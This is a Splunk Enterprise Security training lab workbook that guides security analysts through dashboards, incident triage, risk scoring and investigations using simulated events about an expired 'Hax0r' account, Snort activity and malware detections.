Using Splunk Enterprise Security Lab Exercises

Welcome to the Splunk Education lab environment. Your instructor will provide you with the URL to access
your Splunk server which has the Enterprise Security app installed. You will access the Splunk Web interface
via HTTPS using a browser on your local computer.

A set of Technical Add-ons (TAs) for Enterprise Security have been installed, and the lab environment is
running a testing app called SA-Eventgen that is generating simulated source events. In a production
environment, these events would be generated by Splunk forwarders, which would gather data from your
network’s servers, routers, and applications. Your lab event data only goes back as far as the time the lab
server was set up—probably only a day or so.

NOTE: Please disable popup blockers, ad blockers, and clear your cache (or use incognito mode).

Splunk Logon Credentials:

Username: analyst, password: b0ss0fth3s0c

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 1
Module 1 Lab – Overview of Splunk Enterprise Security
Description
In this exercise, you will get familiar with your lab environment and access the ES user interface.

Steps
Task 1: Log into your Splunk classroom server, configure your user account, and navigate to the ES
homepage.

1. Record your ES server URL (provided by your instructor):

2. Log into Splunk as analyst with the password b0ss0fth3s0c.
3. In the Splunk bar (top menu), select analyst > Account Settings to modify your account details.
4. Enter your name in the Full name field and click Save.
5. From the Splunk main menu select analyst > Preferences. Notice that there are two Preferences tabs,
Global and SPL Editor.
6. On the Global window, set your local time zone and select Enterprise Security as the Default
application.
7. On the SPL Editor window, toggle the Advanced editor button, then toggle the Line numbers button.
8. Click the Themes tab and select Dark Theme. Click Apply.

9. Navigate to the Enterprise Security homepage by clicking in the upper left corner or
going to App: > Enterprise Security.
Note: takes you to the Enterprise Security homepage because you set the Default
app to ES under analyst > Preferences.
10. On the Enterprise Security homepage, review the panels: Security Posture, Incident Review, App
Configuration, ES Documentation, Splunk Answers Community site, and Product Tour.

Task 2: Examine the source events in Splunk that ES is using to monitor the security environment
and review the notable events in the notable index.

11. From the top ES menu, select Search > Search to run a search using Splunk Search Processing
Language (SPL). This page is very similar to the Search & Reporting app you have used before.
12. Search for all events using an asterisk (*) over the Last 15 minutes. If the search runs for more than 30
seconds, you can stop it before it completes. Notice that tens of thousands of events were returned.
Tip: From the result count of this search you can extrapolate the daily indexing volume.
13. Examine the results, including the sources and source types—this will give you a feel for the type of
systems being monitored.
14. Examine the variety of source (src) and destination (dest) IP addresses and hostnames.
Tip: Review the host, signature, and index fields, and examine the eventtype being assigned to
the events.

15. Select All Fields and filter on a couple of fields you find interesting by selecting the checkbox for
each field. Close the Select Fields window. Notice that the new fields are now added under SELECTED
FIELDS.
16. Run a new search for all events against index=notable over the Last 24 hours and note the number of
events returned.
Note: Unless otherwise indicated, execute all searches using a time range of Last 24 hours.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 2
17. Compare the number of notable events to the number of events in the main index over the last 15 minutes.
This demonstrates how useful notable events are; you do not need to search through all the data to find
the events that need attention.
18. Examine the source field values. These are the correlation search names that created the notable events.
19. Examine some of the other discovered fields. Note that they are extracted from the source events, so they
will be similar to what you saw in the main index.
20. Access the Security Posture dashboard. Add up the counts in the Key Indicator tiles. What is the
number of notables?
21. Access the Incident Review dashboard. Does the number of events shown in Incident Review
approximate the number of events in Security Posture?
Hint: review the number of events in the Edit all n Matching Events link.
22. Does this count approximate the number of events returned in the search against index=notable over the
last 24 hours?
23. What conclusions can you draw from these searches?
Answer: Many thousands of events per day are being ingested into Splunk. A small fraction are being
captured by ES correlation searches as notable events.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 3
Module 2 Lab – Monitoring with ES
Description
In this exercise, you will use the Security Posture dashboard to monitor the overall security status of your
organization, and the Incident Review dashboard to work an incident. You will also suppress certain notable
events. For an extended example of the use of these tools, see
docs.splunk.com/Documentation/ES/latest/Usecases/MalwareDetection.

Steps
Scenario: You are investigating reports of unauthorized access to your network resources.

Task 1: Use the Security Posture dashboard.

1. Navigate to the Security Posture dashboard.

2. Review the values in the Key Indicators. Note the totals, as well as the net change for each in the last 24
hours. The net change is shown as either a red or green arrow with the change count.
3. Examine the contents of the 4 panels: Notable Events By Urgency, Notable Events Over Time, Top
Notable Events, and Top Notable Event Sources.
4. Hover over the bars in the Notable Events By Urgency panel and note the values.
5. In the Notable Events By Urgency panel, click the red (critical) bar.
6. Notice that the Incident Review dashboard opens to display only the “critical” notable events.
7. Navigate back to the Security Posture dashboard.
8. Examine the Top Notable Events panel.
9. Click the Activity from Expired User Identity row.
10. Examine the Correlation Search filter on the Incident Review dashboard. Note that it shows only notable
events from the Activity from Expired User Identity correlation search.
11. In the list of notable events, notice that the user account Hax0r has been accessing resources even
though the account is expired.
12. Reset the Incident Review dashboard by clicking Incident Review in the menu bar.
Tip: This re-opens the Incident Review dashboard with all fields set to default—a fast way to clear all
applied filters and reset the dashboard. You will use this technique frequently throughout the lab
exercises.

Task 2: Continue researching unauthorized network access.

13. In the Incident Review dashboard, search for the username Hax0r for the Last 24 hours. You should find
one or more notable events for this user. Remember to click Submit.
Hint: Use the Search field to enter the username.
14. In the results, click > to view the details for one of the Hax0r notable events.
15. Examine the details under Original Event. Some of this data may be useful to determine the seriousness
of this vulnerability.
16. Under Contributing Events, click the View activity from Hax0r link. This takes you to a new browser tab
with a New Search window with the raw events associated with this username.
The new search window uses a custom 10-minute time range which references the creation time of
the notable event (5 minutes before and 5 minutes after). This allows you to see raw events that
occurred immediately before and after the notable event.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 4
17. Expand an event and note the Type=Failure Audit, Message=Logon Failure, User Name=Hax0r, and
the Source Network Address. You may have to click Show all 28 lines.
Tip: In this case, Type=Failure Audit and Message=Logon Failure indicate failed logon attempts.
So, Hax0r is not actually authenticating, but the fact that someone is attempting to use this expired
account is an issue.
18. Close the search window browser tab and return to the Incident Review dashboard.

Task 3: Begin working the issue.

19. In the Incident Review dashboard, make sure the search results are still filtered to the user Hax0r.
20. Click the Edit All n Matching Events link.
21. Click the Status drop-down, select In Progress and set the Owner to yourself.
22. Click Save changes and notice the change in status and ownership.
Now you can begin working with network analysts and others to research and resolve the issue. While
this takes place, you will still need to review new incidents.
23. At the top of the Incident Review dashboard, click in the Status field and select New. Hax0r is still in the
Search field. Click Submit. You are looking for incidents with Status = New that contain the text Hax0r.
24. Notice that you no longer see your In Progress Hax0r incidents.
You would do this to see only new incidents requiring attention. New events would normally be
assigned to an owner and their status changed to show they are In Progress or Resolved.
25. Reset the Incident Review dashboard.
26. In the Owner filter, select yourself and run the search.
27. You should only see incidents assigned to you. This is a typical way to view your assigned incidents.

Scenario: Several false positives have been generated and are coming from a set of servers named PROD-
MFS-XXX, which are a set of QA lab workstations used to test production security configurations.
You want to first determine the workstation’s status—are these workstations still online? You will
ping them to see.

Task 4: Test workstation status.

28. In the ES menu bar, select Incident Review.

29. In the Security Domain field, select Endpoint.
30. In the Search field, search for notable events associated with the PROD-MFS-* servers.
31. You should see several notable events for malware infections. Expand the details of one of these events.
32. Click the link under Contributing Events to see the original events that triggered this notable event.
A new search window opens and displays events from the Malware data model. Take a minute to
explore other information about the incidents.
33. Note that this information comes from the Malware data model, Malware_Attacks object.
34. Close the contributing events search window.
35. Now check the status of the affected system. In Incident Review, open the notable event’s Actions menu
and select Run Adaptive Response Actions.
36. Select + Add New Response Action and select Ping.
37. In the Ping form, from the Host Field drop-down list, select Destination (dest) and enter 4 in the Max
Results field. Use the default index of main. (You may need to disable popup blocker.)

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 5
 Note: Index is where to save the results (existing index or custom index). Defaults to main. Worker Set is
used for executing adaptive response actions on a Splunk Cloud ES search head.
38. Click Run. The Ping action is dispatched.
39. Close the Adaptive Response Actions window.
40. In the incident’s details, scroll down to Adaptive Responses: and click the refresh icon.
41. Verify that your Ping action is listed with a success status.
42. Click Ping to see the results.
A new search window opens and displays the results of your Ping action. This verifies that the server
is online.
(Note that all the PROD-MFS* host names resolve to 127.0.0.1—this is intentional for our lab
environment.)
43. Close the search window.

Scenario: Now that you know the status of the test systems, close out the affected false positive notable
events.

Task 5: Remove the false positives from the list of incidents.

44. In Incident Review, make sure you are still displaying all of the events in the Endpoint domain for PROD-
MFS-* servers.
45. Click Edit All n Matching Events.
46. Change the Status to Closed and make sure the Owner is set to you.
47. In the comments, enter False positive generated by testing process.
48. Click Save changes and you will be returned to Incident Review.

Task 6: You have resolved the Hax0r issue by hardening a firewall asset. You can now resolve your
incident.

49. Reset the Incident Review dashboard, filter Status to In Progress and search for all Hax0r incidents.
Click Submit.
50. Click Edit all n Matching Events.
51. Change the status to Resolved and click Save changes.
In the future, you probably want to see only unresolved, open incidents.
52. Clear the dashboard.
53. Search for open incidents by selecting all status values except Resolved and Closed from the Status filter
and click Submit.
54. Verify that the Resolved and Closed Hax0r incidents do not appear in the search results. (You could see
a New notable event on top that just got generated by the correlation search.)
55. Clear the Incident Review dashboard, and practice filtering out all events except those that are Resolved
(4) or Closed (5). Enter status>3 to the Search field. You should now only see the Resolved or Closed
events.
Tip: The event status field name is status, lower case, and the values are integers, with 0 =
“unassigned”, 1 = “new”, 2 = “in progress”, 3 = “pending”, 4 = “resolved”, and 5 = “closed”.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 6
Scenario: You have closed the PROD-MFS-XXX false positives, but new notable events will still occur. You
would like to suppress them for the rest of the testing project.

Task 7: Suppress notable events.

56. Clear the Incident Review dashboard.

57. In the Search filter, enter PROD-MFS-* and click Submit.
58. Note the server name and signature on the first few results (i.e. Mal/EncPk-C On PROD-MFS-001,
LeakTest On PROD-MFS-005, HIPS/IPConnect-002 On PROD-MFS-004).
59. On one of these events, click the Actions menu and select Suppress Notable Events.
Note: For the purpose of this exercise you are suppressing notables for the selected server and
signature (i.e. LeakTest On PROD-MFS-002).
The selected server could appear in other notables for a different signature.
In a production environment, if a high number of servers were identified as false positives, your ES
administrator would likely make a permanent adjustment to the correlation search to prevent future
false positives from occurring.
60. In the Suppress From … To fields, select a range from now until a date 6 months in the future.
61. Select Save to return to Incident Review.
Note: no new notable events will be generated for this server with this signature for the next 6
months.
62. To confirm the suppression, search for the machine name (PROD-MFS-XXX) noted in the steps above. You
should not see events for the server name and signature, though you may see events for the same server
with a different signature.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 7
Module 3 Lab – Risk-Based Alerting
Description
In this lab exercise, you will filter the Incident Review dashboard for Risk Notables and view the risk-based
information available for the risk objects. You will then use the Risk Analysis dashboard to examine how risk
is allocated to objects and users in your environment.

Steps
Task 1: Review the risk-based information for a risk notable.

1. Navigate to the Incident Review dashboard.

2. From the Type drop-down select Risk Notable and from the Time drop-down select Last 60 minutes.
Click Submit.
3. Select the checkbox for one of the Risk Notables and click Edit Selected.
4. Edit the event with the following information, click Save changes, then click Close.
• Status: In Progress
• Urgency: High
• Owner: Assign to me
• Disposition: True Positive – Suspicious Activity

Note: Use the Disposition field to classify the notable and separate the false positives without
impacting the status of the notable. Dispositions enable you to drill-down on the notables that pose the
highest threat and accelerates the triage of notables during an investigation, which helps to respond to
security threats faster.

5. On the Incident Review dashboard, click Clear all to clear the filters selected above.
6. Sort the Incident Review dashboard for Risk Notables with a Status of In Progress. Click Submit.
7. Expand the risk notable that has been assigned to you and click the Contributing Events link to view the
individual risk attributions that created the risk notable. A new search window opens.
Note: The “Risk Threshold Exceeded For Object Over 24 Hour Period” correlation search triggers
when the risk score for a specific object reaches a threshold of 100 over a 24-hour period.

8. Close the new search window and return to the filtered Incident Review dashboard.
9. Click the down-arrow for the Risk Object and click Workbench – Risk (risk_object) as Asset or
Workbench – Risk (risk_object) as Identity depending on the type of risk object selected (system or
user).
10. View the recent risk modifiers for the risk object. These events are pulled from the Risk Analysis data
model.
11. Scroll to the bottom and view the information in the Risk Scores by Artifact and MITRE ATT&CK
Techniques and Tactics panels.
12. Close the Embedded Workbench.
13. Click the number in the Risk Events column which represents the number of risk-based events that
created the risk notable for the object (system or user).
14. Review the information on the Risk Events window. The top panel displays the timeline visualization of the
contributing risk events. Use the zoom tools on the right change the timeline.
Note: Zooming in/out can help narrow down the time of occurrence. The timeline visualization plots
the contributing risk events using time on the x-axis and risk score on the y-axis. The timeline

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 8
 visualization uses color codes on the icons that indicate the severity of the risk scores. A lower risk
score corresponds to a lighter color icon.

15. Click on several of the events in the timeline visualization to view the details of the event including the
name of the correlation search that created the event, the time of the event, and any MITRE ATT&CK
tactics and techniques configured for the correlation search.
Note: clicking an event in the timeline visualization highlights the corresponding event in the
Contributing Risk Events panel.

16. From the Contributing Risk Events panel, expand an event to view the details including the risk rule, risk
score, annotations, and threat object.
17. Close the Risk Events window.

Scenario: Hax0r is a high-risk user—use the Risk Analysis dashboard to examine where this risk
comes from.

Task 2: Examine user risk.

18. Navigate to the Incident Review dashboard and search for Hax0r.
19. Open the details of a Hax0r incident. The number in the red box next to the Hax0r user ID is all-time risk
score for the user.
(If Hax0r also had an email address, the risk score in Incident Review would be the sum of both
scores. On the Risk Analysis dashboard, the score is not cumulative, but specific to the username.)
20. Click Hax0r’s Risk Score to open the Risk Analysis dashboard (automatically filtered to Hax0r).
Based on the Most Active Sources panel you can see that Hax0r’s risk comes from the correlation
search Identity - Activity from Expired User Identity - Rule.
21. Clear Hax0r from the Risk Object filter and re-run the search.
Now you see all risk activity for the Last 7 days.
22. Examine the Risk Modifiers Over Time graph.
This shows a diagram over time (default: previous 7 days) that indicates points in time when risk
scores on assets in your enterprise increased.
Important: Events where the risk score increased rapidly are cause for concern.
23. Click on largest risk score column in the graph to drill down into the source events that triggered the
increase in risk.
24. Examine the fields available.
The data in these fields can help you understand what threats, systems, processes, and users could
be involved in the increased risk assessment.
25. Navigate back to Security Intelligence > Risk Analysis.
26. Examine the panels: Risk Score by Object, Most Active Sources, and Recent Risk Modifiers.
27. Practice drilling down by object or risk source. (There are other risk objects and users in addition to
Hax0r.)
28. From Security Intelligence > Risk Analysis re-sort the Risk Score By Object panel by source_count
(this will show how many different sources of correlation searches there are for each risk object and put
the ones with the most sources of risk at the top).
29. Click one of the top rows containing an IP address to drill down into the search behind the result.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 9
 The drill down search uses the Risk Analysis data model. The events are stored in the Risk index.
Each event in the Risk index is an association to a user or device and a risk score. This is where all
risk scoring is stored.
All the risk sources are from correlation searches. Individually, each correlation search severity may
not be very high, but taken together, they are causing the risk score of this object to increase more
than other objects.
If this were a real environment, you might start an investigation into why this object has so many
sources of risk.
30. Navigate back to the Risk Analysis dashboard and examine the Most Active Sources panel.
31. You can re-sort by risk_score, risk_objects, or count to identify the most common sources of risk in
your environment. This could help you prioritize your risk mitigation effort.

Scenario: You determine that the Hax0r account has not been compromised, and therefore you can
reduce the risk for this user.

Task 3: Manually adjust a risk score.

32. In the Risk Object filter, type: Hax0r and click Submit.
33. Make a note of Hax0r’s current risk score. You will erase the score accumulated for Hax0r.
34. Click Create Ad-Hoc Risk Entry.
35. Enter the negative value of Hax0r’s current risk score. (If the current score is 160, enter -160.)
36. Populate the remaining fields as follows:
Risk Message: Resetting Risk
Risk object: Hax0r (this is case sensitive and must be entered exactly as shown)
Risk object type: user

37. Click to remove Threat Objects.

38. Click Save.
39. Refresh your browser window or select Security Intelligence > Risk Analysis again.
40. Filter the form to user Hax0r and set the time range to Last 7 days. Click Submit.
41. Verify that the net risk applied to Hax0r for the last 7 days has been reduced to 0.
42. In the Most Active Sources panel, click the AdHoc Risk Score adjustment you just created to drill down
into the risk index data. The AdHoc Risk Score adjustment has been placed in the risk index.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 10
Module 4 Lab – Investigating with ES
Description
In this lab exercise, you will use the Investigation Workbench to investigate and document potential threats.

Steps
Scenario: You notice that there are a number of events from an expired user named Hax0r. You
decide that an investigation should be opened for further research.

Task 1: Create an investigation to monitor user Hax0r over time.

1. Click Investigations > Create new investigation.

2. Name your investigation Identity to Monitor: Hax0r.
3. Change the Status to In Progress and click Save.
4. Click on the new investigation to open it.
5. The Investigation Workbench opens. The Investigation Bar is displayed at the bottom of the window.
Icons include: notify on new related notables , add an investigation artifact , run a quick search ,
add a note to an investigation , and add an action history item to an investigation .

6. From the Investigation Bar, click to add an artifact (or click the + Add Artifact button).
7. The Add Artifacts window appears. In the Artifact field, enter Hax0r and notice that the Type field
recognized your entry as an Identity.
8. Click Expand artifact and notice that the identity lookups discovered related identities.
9. Click Add to Scope.

10. Under Artifacts on the investigation page, select the radio button for Hax0r and click Explore.
11. Examine the tabs and panels on the right. Notice that areas were automatically populated with information
for you to explore and document.
12. Select the Endpoint Data tab and scroll down to the Authentication Data pane.
13. From the entry under Authentication Data, add the following artifacts to your investigation: src,
src_user, and dest. Complete the following for each new artifact:
• Click each artifact and the Add Artifacts window opens.
• The Artifact field is populated with the artifact name.
• From the Type drop-down select Asset for src and dest, and Identity for src_user.
• Click Add to Scope.
14. The new artifacts are added to the Artifacts window on the left. Click the Select All link and click Explore.
15. Review the new information added under the Endpoint Data, Network Data, and Risk tabs.
16. Click +Add Content then click Add single tab. From the Select a tab dropdown, select Authentication.
17. Click Save.
18. Scroll to the bottom of the Authentication tab and review the panels and data added to the investigation.
19. On the Authentication - Source panel, click the expand icon .
20. From the dest column, add a few of the entries as “Asset” artifacts, and from the user column add a few
usernames as “Identity” artifacts.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 11
21. From the investigation Artifacts window click the Select all link and click Explore. The newly added dest
and user artifacts are added to the investigation tabs.
22. Review the information added to Context, Endpoint Data, Network Data, Risk, and Authentication
(remember to collapse the Authentication - Source window on the Authentication tab).

23. Select the Timeline and Summary views and notice that there are no notable events
associated with the investigation. Let’s add some notables!

Task 2: Add notable events to your investigation.

24. From the Incident Review dashboard, search for Hax0r events over the last 24 hours.
25. Select the checkboxes for the first 5 events found and click Add Selected to Investigation.
26. From the Add Event to Investigation window, click the link next to Investigation.
27. Choose the Identity to Monitor: Hax0r investigation and click Save.
28. The events are added to the investigation. Click Open Identity to Monitor: Hax0r.
29. The Artifact Extraction window opens showing that the Hax0r artifact already exists because it was
added earlier with all its aliases. Click Ok.

Task 3: Add an alert for results of future related notable events.

30. On the Investigation Bar, click the bell icon .

31. In the Related Notable Event Livefeed for Last 48 Hours window, click the Enable notification toggle.
32. View the notable events. Any new events involving Hax0r for the last 48 hours are listed here.

33. If one or more events are listed, select an event and add it to your investigation using the plus sign .
You may add all or some of the events to your investigation.
34. If you are done reviewing and have left some events deselected, click Mark all as Seen.
35. Click Close.
The next time a notable event is generated for Hax0r, the Related Notable Events icon changes from
gray to orange.

36. Notable events can now be seen under the Summary and Timeline views.

Scenario: As you are exploring, your supervisor calls. Your supervisor assigns you an urgent task to
investigate the use of Snort in your environment. (Snort is not on the list of approved
network tools.)

Task 4: Start an investigation and add a note.

37. Navigate to Investigations.

38. Click Create new investigation.
39. Enter a title of Snort Activity.
40. Set the status to In Progress.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 12
41. Click Start investigation and the Investigation Workbench opens.
42. Add a note by clicking the Notes icon in the bottom right. The Investigation notes window opens.
43. Under Notes, click +Add new Note, and the Create Note window opens.
44. Enter the values below:
Title: Start investigation
Note: Investigating the use of Snort on the network.
45. Click Add to investigation and notice that the new note is added under Notes. Close the Investigation
notes window using the X in the upper right corner.
46. From the Investigation Workbench, select the Timeline view. From the Type: drop-down select Note.
Notice that no notes display under the Timeline.
47. Click the Notes icon , click on the Start Investigation note created above, the Edit Note window
opens.
48. Check the Show on timeline checkbox and click Save. Notice the Start Investigation note is now under
Timeline Notes.
49. Close the Investigation notes window.
50. From the Investigation Workbench, select the Timeline view, and notice that the Start Investigation
note now displays in the Timeline. Note that you can make a note visible on the Timeline by using the
+Add new Timeline Note option in the Investigation notes window, or by checking the Show on
timeline checkbox in a standard note.

Task 5: Find Snort events and add a Quick Search.

51. Add a search by clicking the Quick Search icon in the Investigation Bar.
52. Run the search index=main snort for the Last 60 minutes.
53. Click Add Search String to Investigation.
54. Click the Notes icon .
55. Click + Add new Note to add a note to the investigation.
Title: Quick Search shows Snort activity for last 60 minutes.
Note: Snort is not approved.
Select the Show on timeline checkbox.
56. Click Add to investigation. Close the Investigation notes window.

Task 6: Create a notable event to track status.

57. In Quick Search, click to expand one of the Snort events.

Tip: Click and drag the icon to expland the Quick Search window.
58. Click the Event Actions button, then select Create notable event.
59. Enter field values as follows:
Title: Snort activity example
Security Domain: Network
Urgency: High
Owner: yourself (analyst)
Status: In Progress
Description: No authorized use of snort in our network—investigating.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 13
60. Save the new notable event and you are redirected to Incident Review.
61. The Incident Review dashboard shows your ad hoc notable event in the results list. (If you do not see it,
refresh the page by clicking Incident Review.)
62. Select the checkbox for the event.
63. Under the Actions heading at the right, select and select Add Event to Investigation.
64. In the Add Event to Investigation window, click the Investigation drop-down and select your Snort
Activity investigation.
65. Click Save and click the Close button.

Task 7: Analyze Snort activity.

66. Navigate to Incident Review.

67. At the lower left corner of the Incident Review dashboard in the Investigation Bar, click the All
Investigations icon .
68. Select the Snort Activity investigation.

69. Click the Quick Search icon .

70. In the search bar, execute the following search over the Last 60 minutes:
index=main snort | stats count by category | sort -count
You see an overview of the types of most attempted Snort activity.
71. Click the Add Search String to Investigation button.
72. Highlight and copy the first two events.
73. Click the Notes icon and add a note documenting the top two types of attacks (from the Quick Search
results).
74. Enter a name for the note, paste the events into the Note field, select the Show on timeline checkbox,
and click Add to investigation. Close the Investigation notes window.
75. Update and run the Quick Search to include the destination IP addresses and click Add Search String to
Investigation.
index=main snort | stats count by dest, category | sort -count
76. Highlight and copy the first two events.
77. Click the Notes icon and add a note documenting top two destination (host) IP addresses (from the Quick
Search results).
78. Enter a title for the note, paste the events into the Note field, select the Show on timeline checkbox, click
Add to investigation, and close the Investigation notes window.
Now you have documented which endpoints in your network are being targeted, and what types of
attacks are being used.
79. Update the Quick Search to determine where the Snort attempts are originating:
index=main snort | stats count by src | sort -count
80. Highlight and copy the first two events.
81. Add a note documenting the most frequent source IPs (from the Quick Search results).
82. Enter a title for the note, paste the events into the Note field, select the Show on timeline checkbox, click
Add to Investigation, and close the Investigation notes window.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 14
Task 8: Investigate source systems.

83. In your Quick Search window, run this search for the Last 60 minutes, replacing the
“most.common.src.ip” with the source IP address from the last Quick Search done above.
index=main snort src={“most.common.src.ip”}
84. Expand the details of one of the events.
85. Scroll down to the src field.
86. At the far right under Actions, open the field menu for the src field (the down arrow at the far right).
There are many investigative tools here—you will look at a couple.
87. Scroll down and select the Nslookup option (which finds the domain name of an IP address, or the IP
address of a domain name).
A new search window opens and shows the results of the nslookup command. Examine the
information.
88. Return to the investigation and click to add an Action History item.
89. In the Add Action History window, click Select action history type > Search Run and click the spyglass
(Search).
90. The first item that appears should be the nslookup search you just ran. Select Add to Investigation and
click Done.
91. From the Quick Search window, open the src field’s Action menu, and select Instrusion Search (as
source). The Intrusion Search dashboard opens.
This dashboard shows the types of IDS events that have been generated for this server.
The signature column lists various types of attacks happening on this server.
The dest values identify the target(s) of the attacks.
92. Expand one of the source events in the lower panel to examine its details.

93. From the Instrusion Search window, click Export then select Export PDF.
94. Close the Instrusion Search window.
95. From your investigation, add a new note called Instrusion Search as Source, select the Show on
timeline checkbox, and use the file attachment option to add the exported Intrusion Search PDF
document. Click Add to investigation.
Note: If the filename contains underscore characters or other non-supported characters, the Change
file name window appears. Click the Replace not supported characters with “-“. button and click
Change.
96. Close the Investigation notes and Quick Search windows.

Task 9: Review your investigation from Timeline and Summary views.

97. Click Investigations and open the Snort Activity investigation.

98. Select Timeline and toggle between List and Slide views to review all of the entries you created during
the investigation.
Tip: with the above information, you can work with your network administrators to eliminate the
snooping attacks.
Any physical actions can also be logged in the timeline, as well as scans of any pertinent documents,
copies of files, etc.
99. For a higher-level view of your investigation, navigate to the Summary view.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 15
Module 5 Lab – Forensic Investigation
Description
In this lab exercise, you will use some of the forensic dashboards to investigate activity in your environment.
First, you will dive into some more of Hax0r’s activities in the Access domain. Then you will do an investigation
into some network traffic anomalies. Finally, you will look into some malware issues in the Endpoint domain.

Steps
Scenario: Follow up on the Hax0r incident.

Task 1: Use the Access Domain.

1. Navigate to Incident Review and search for Hax0r.

2. Expand and view the details of a Hax0r incident in the Identity Security Domain.
3. Open the Action menu for the User field and note the options available.
4. Select Access Search and a new window opens, showing login attemps for Hax0r.
5. Note that all login attempts are on the same system (HOST-001) and are all failures.
6. All the attempts are using the win:local app. These login attempts are not coming across the network—
they are originating from a 10.x.x.x address.
Let’s see how these Hax0r events fit into the overall access profile of your organization.
7. Navigate to Security Domains > Access > Access Center.
8. Notice that there are many login apps being used and that Authorization Attempts are increasing
(AUTH. ATTEMPTS Key Indicator).
9. Change the Action filter drop-down to failure, and the App filter drop-down to win:local.
10. Set the time range to Last 24 hours and click Submit.
11. Examine the access pattern in the top two panels—it is very repetitive, indicative of an automated script,
and it is happening throughout most of the day.
12. In the Access Over Time By App panel, click one of the high peaks to drill down into the activity at that
point.
Note: You will probably see activity from Hax0r, but there are others. You will add this to the Hax0r
investigation to examine how the Hax0r account information might have been exfiltrated from your
organization and who might be using it.

13. Expand one of the Hax0r events, select the Event Actions menu and click Add Event to
Investigation.
14. From the Add Event to Investigation window, click Investigation: Select… and select the Identity to
monitor: Hax0r investigation and click Save.
15. In the Add Event to Investigation window, click Open Identity to monitor: Hax0r and the Investigation
Workbench opens in a new browser tab.
16. Depending on which event you selected, you may see that the Artifacts panel was populated with more
artifacts. Explore them if you like.
Note: If you see any assets or identities of interest in your exploration, you can click them to add them
as additional artifacts for your investigation.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 16
Scenario: Examine the target server of the Hax0r attack to identify malicious software.

Task 2: Use the Malware Search and Center dashboards.

17. In ES, navigate to Security Domains > Endpoint > Malware Search.
18. In the Signature field, enter Mal*, in the Destination field, enter HOST-001, over the Last 4 hours and
click Submit.
Note: In the upper panel, you will see a summary of the activity on the server that has been detected
by a Sophos antivirus scanner, including the malware file name, the user ID associated with the file,
and the signature, or type of virus software.
The lower panel contains the original events, including details like the virus type and action taken.
19. Expand one of the signature = Mal/Packer raw events. Several viruses have status = “Not
cleanable”, indicating they are still active on the system.
20. From the raw event, click on Mal/Packer in the signature field to examine via search.
Mal/Packer is a common virus in the wild, often associated with email-based phishing.

21. Navigate to Security Domains > Endpoint > Malware Center.

22. Examine the overall pattern of malware activity. Notice that Mal/Packer appears in the Top Infections
panel.
23. Under the Top Infections panel, click the Mal/Packer bar to see all systems affected by this malware.
Note: as you can see in the dest column, HOST-001 is not the only system affected by Mal/Packer.
Seeing this, you would probably initiate a ticket with your IT team to begin removing the malware.

Scenario: As a network analyst, one of your daily tasks is to monitor the network for vulnerabilities.
You will begin by checking on the ES Vulnerability Center to see if any new vulnerabilities
have appeared since your last check.

Task 3: Use the Vulnerability Center and Search dashboards.

24. Navigate to Security Domains > Network > Vulnerability Center. Make sure the dashboard is searching
over the Last 24 hours.
25. Examine the values in the Key Indicators—especially Total Vulnerabilities (TOTAL VULNS). They have
gone up quite a bit.
26. Examine the panel results. Note the relative number of vulnerabilities by signature (Top Vulnerabilities),
and the list of Most Vulnerable Hosts.
27. In the Top Vulnerabilities panel, locate the USN19-1: squid vulnerabilities bar.
Note: depending on your browser, the longer vulnerability names may be compressed.
If for some reason squid vulnerabilities is not in the Top Vulnerabilities panel, navigate to
Security Domains > Network > Vulnerabilities Search and, in the Signature field, search for
*squid* over the Last 24 hours.
28. Click the USN19-1: squid vulnerabilities bar in the chart to drill down into the issues for this
vulnerability type. There are potential issues with a Squid proxy server.
The Vulnerability Search dashboard opens and displays the events for this vulnerability.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 17
 The top table in the dashboard lists vulnerabilities by destination server (dest) in order of decreasing
count of vulnerability issues.

29. From the Vulnerability Search window click the dest IP value in the top row of the upper panel to drill
down into issues for the most active server.

Note: this opens a search page with events for the destination IP you selected. The search uses the
Vulnerabilities data model.
30. Expand one of the events and locate the event’s dest field.
31. Open the dest field’s Actions menu (at the right end of the field’s row) and review the selection of
available tools to continue your investigation. Scroll to see all options.
32. Select Intrusion Search (as destination). The Intrusion Search dashboard opens. Make sure the time
line is the Last 24 hours and click Submit.
Note: this dashboard shows the types of IDS events that have been generated for this server (upper
panel) and the source events (lower panel).
The signature column lists various types of attacks (trojan detection, attempted information leak,
suspicious filename detections, etc.) happening on this server. Scroll through the pages to view the
different signatures.
The src values identify the origin of the attacks.
33. In the signature column, click the name of an attack signature to drill down to its source event(s).
34. In the new search page, examine the events detected by your intrusion detection scanner.
35. Expand the time range of this search to see more events.

Scenario: The vulnerabilities you have identified so far have made you wonder what other intrusion
activity might be happening.

Task 4: Use the Intrusion Center dashboard.

36. Navigate to Security Domains > Network > Intrusion Center.

37. For IDS Type, select network.
38. Make sure the time range is Last 24 hours and click Submit.
39. Examine the values for the Key Indicators including the High Severity Network Attacks (HIGH SEV.
ATTACKS) to see if they are rising or falling.
40. Examine the summary panels, especially the pattern of Attacks Over Time By Severity and the list of
Top Attacks.
41. In the Scanning Activity (Many Attacks) chart, click the bar of the top IP address to drill down to the
Intrusion Search dashboard.
42. Scroll through the intrusion events to view the different signatures.
43. In the Signature field enter FTP:AUDIT:REP-INVALID-REPLY and remove any information in the Source
field. Click Submit. Note that invalid FTP replies are a large percentage of the overall intrusion issues.
